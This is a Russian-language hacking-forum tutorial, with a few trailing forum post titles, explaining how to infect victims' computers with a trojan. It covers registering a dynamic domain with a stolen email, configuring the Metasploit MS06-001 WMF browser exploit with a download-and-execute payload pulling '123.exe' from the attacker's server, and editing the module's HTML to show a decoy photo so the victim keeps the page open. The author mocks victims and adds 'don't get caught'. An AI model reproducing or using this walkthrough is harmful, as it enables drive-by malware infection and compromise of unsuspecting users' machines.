------------------------------ Теперь давай зарегистрируйся на http://no-ip.com <<< Если ты в албанском (англ.) НУБ. Слушай меня !!! Рис 2.2 Жми… Sign-up Now! как показано на рисунке. И в води все свои не существующие данные, кроме мыла (мыло желательно угнанное (чужое)) ----------- Зарегистрировался ? Молодец ! Идём дальше… Рис 2.3 Нажимаем на «Add» ----------- ----------- Видим >>> Рис 2.4 Выбираем домен (У ТЕБЯ СВОЙ) всё остальное оставляем как есть. Выбирай бесплатный домен (FREE) нууу а если хочеш можиш и купить домен для своего IP/ ----------- После в низу нажимай «Create Host» И тебе сообщают что доменное имя к акуанту привязано. Осталось тока привязать его к твоему IP адресу ) ------------------------------ Едем дальше… качай программку «NO-IP DUC» 668K >>> http://www.no-ip.com/downloads.php?page=win Нажимай «Download 2.2.1» После нажимай «Download Now» всё. Рис 3.1 Скачал ? ----------- Едем, плывём, танцуем (как тебе луче) ДАЛЬШЕ >>> А вот и программка такая маленькая и умная аш глаза радуются ) Ой о чём это я, ах да вот >>> Рис 3.2 Ну всё она сама всё сделал за тебя и привязала к твоему IP-адресу домен «madona.zapto.org» (У ТЕБЯ СВОЙ) Если это не произошло… то кликай на кнопку «Edit» в программе. В води свой логин (мыло) и пароль от ака на no-ip.com (не путать с паролём от мыла). ------------------------------ Ну наконец-то - скажешь ты - мы переходим не посредственно к «Metasploit Framework 3» Способ атаки будет таков: Мы: Windows XP/NT Он/Она (жерта): Windows XP/NT Такс… Запусти «Metasploit» С:\Program Files\Metasploit\Framework3\msfconsole.bat Набери: show exploits ----------- Найди строчку: windows/browser/ms06_001_wmf_setabortproc ------- Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution Рис 4.1 ms06_001_wmf_setabortpro <<< Это наш Сплоит для Браузера IE 6 (Internet Explorer) который мы будем использовать. ----------- Теперь набери: show payloads Найди строчку: windows/download_exec ------- Windows Executable Download and Execute Рис 4.2 download_exec <<< Это наш Shell ----------- А вот сейчас мы этот сплоит выберем командой: use [путь/имя_сплоита] Вот так: msf > use windows/browser/ms06_001_wmf_setabortproc Рис 4.3 На рисунке видно что сплоит выбран: msf > use windows/browser/ms06_001_wmf_setabortproc msf exploit(ms06_001_wmf_setabortproc) > ----------- Командуем info: msf exploit(ms06_001_wmf_setabortproc) > info Видим следующие: Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution Version: 3906 Platform: Windows Privileged: No License: Metasploit Framework License v1.0 Provided by: hdm <hdm@metasploit.com> san <san@xfocus.org> O600KO78RUS <O600KO78RUS@unknown.ru> Available targets: Id Name -- ---- 0 Windows XP/2003/Vista Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 195.239.203.203 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH no The URI to use for this exploit (default is random) Payload information: Space: 1852 Avoid: 1 characters Description: This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request. References: http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx http://www.securityfocus.com/bid/16074 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560 http://www.osvdb.org/21987 http://milw0rm.com/metasploit.php?id=111 http://www.microsoft.com/technet/security/advisory/912840.mspx http://wvware.sourceforge.net/caolan/ora-wmf.html http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt Строка: SRVHOST (LHOST) 195.239.203.203 ---- Наш IP-адрес на катором повиснет сплоит. (У ТЕБЯ СВОЙ IP) SRVPORT (PHOST) 8080 ------------------ Порт на катаром будет работать сплоит. URIPATH (URIPATH) -------------------------- Главная наверно фича «Metasploit Framework 3» ------------------------------ ------------------------------ Настраиваем сплоит Командуем set LHOST ваш.ip.адрес: msf exploit(ms06_001_wmf_setabortproc) > set LHOST 195.239.203.203 LHOST => 195.239.203.203 Настроили IP-адерс. ----------- Командуем set URIPATH madona.jpg: msf exploit(ms06_001_wmf_setabortproc) > set URIPATH madona.jpg URIPATH => madona.jpg Присвоили значение не полной ссылке «/madona.jpg ----------- Командуем set PAYLOAD windows/download_exec: msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/download_exec PAYLOAD => windows/download_exec Прикрутили Shell к нашему Exploit`у ------------------------------ Настраиваем Shell Командуем set URL http://ВАШ_САЙТ.ru/123.exe msf exploit(ms06_001_wmf_setabortproc) > set URL http://***********.ru/123.exe URL => http://***********.ru/123.exe 123.exe --- это наша «плохая программа». Спецом заранее залита на ваш хостинг ) Если этот Shell не хочет работать т.к. закачивать троя на комп жертве. То воспользуйтесь более функциональными Shell`ми из этой серии... windows/download_exec ------------ Windows Executable Download and Execute windows/download_exec/bind_tcp --------- Windows Executable Download and Execute, Bind TCP Stager windows/download_exec/find_tag --------- Windows Executable Download and Execute, Find Tag Ordinal Stager windows/download_exec/reverse_http ---- Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager windows/download_exec/reverse_ord_tcp - Windows Executable Download and Execute, Reverse Ordinal TCP Stager windows/download_exec/reverse_tcp ------ Windows Executable Download and Execute, Reverse TCP Stager Например Shell reverse_tcp может открыть CMD жертвы. Нооо это уже другая история... ------------------------------ Всё наш эдакий «экзотический способ» в паривания троя ГОТОВ !!! Командуем exploit: Рис 4.4 msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Using URL: http://195.239.203.203:8080/madona.jpg [*] Server started.[*] Exploit running as background job. msf exploit(ms06_001_wmf_setabortproc) > За вместо IP-адреса http://195.239.203.203:8080/madona.jpg мы делаем. http://madona.zapto.org:8080/madona.jpg тоесь как делаем ручками, ручками… ------------------------------ Всё можно найти лоха и дать ему ссылку. После чего к нему на комп загрузится .wmf файл ) а после и ваш трой и запустиЦо. ------------------------------ Но эмммм… есть одна небольшая проблемка… ) Когда человек откроет эту страничку к сожалению он не увидит фотки и может сразу закрыть окно Браузера. Это не хорошо т.к. Этот сплоит на переполнение и чтобы всё начело работать надо не которое время подождать ну примерно секунд 10. А в это время пока идут 10 секунд лох видит в Браузере надпись «One second please...». Это очень подозрительно вам так не кажется ? ----------- Как же от этого избавится… Очень, очень просто… надо найти исходник этого сплоита и изменить его. ) Исходник >>> C:\Program Files\Metasploit\Framework3\home\framework\modules\exploits\windows\browser\ms06_001_wmf_setabortproc.rb Открываем это сплоит через Word (обычный (не офис)) Ищем строку: html = "<html><meta http-equiv='refresh' content='0; URL=" + get_resource + '/' + Rex::Text.rand_text_alphanumeric(rand(80)+16) + ".#{ext}'><body>One second please...</body></html>" ----------- Если вы хоть малость понимаете в HTML то вы уже просекли в чем тут дела ) Ну а если вы не парите даже в HTML тоооо… ну что же и такое бывает ) мы все люди. html = "<html><meta http-equiv='refresh' content='0; URL=" + get_resource + '/' + Rex::Text.rand_text_alphanumeric(rand(80)+16) + ".#{ext}'><body><center><img src="http://ВАШ_САЙТ/ВАША_ФОТКА.jpg"></img></center></body></html>" http://ВАШ_САЙТ/ВАША_ФОТКА.jpg наверное вы уже п0нели что луче сделать какунеть фотку голой мадонны аля 80-ых… ----------- Теперь лох будет любоваться на соски мадонны, а в это время к нему будет потихоньку проникать «ваша плохая программа» ) в премом смысле… ------------------------------ Ну всё желаю всем удачи и т.д. И не попадайтесь… Напомню что типа мол ) Автор (тоесть Я) предоставил этот материал только для ознакомительных целей. За использование данного материала автор ответственности не несет. Copyright the text and images by NARCOMAN © 2007 ------------------------------ Но на самом деле мы то знаем что это всё ПИЗД*** И щас ты схватиш этот грёбаный МетоСплоит и будете хаКать весь инет… ----------- В следующих статях я незнаю что я буду писать ( Попросите меня мож чё придумаем ) ----------- http://forum.antichat.ru/threadnav24465-1-10-metasploit.html <<< сплоиты для IE.
  10. NARCOMAN.exe

    Троянский вирус, как спрятать.

    ну а я что писал ???
  11. NARCOMAN.exe

    Троянский вирус, как создать.

    Сёдня будет !
  12. NARCOMAN.exe

    Троянский вирус, как создать.

    ) Несмешно...
  13. NARCOMAN.exe

    Ночь в музее \ Night at the Museum

    Супер фильм СМОТРЕТЬ ВСЕМ !!!!!!!!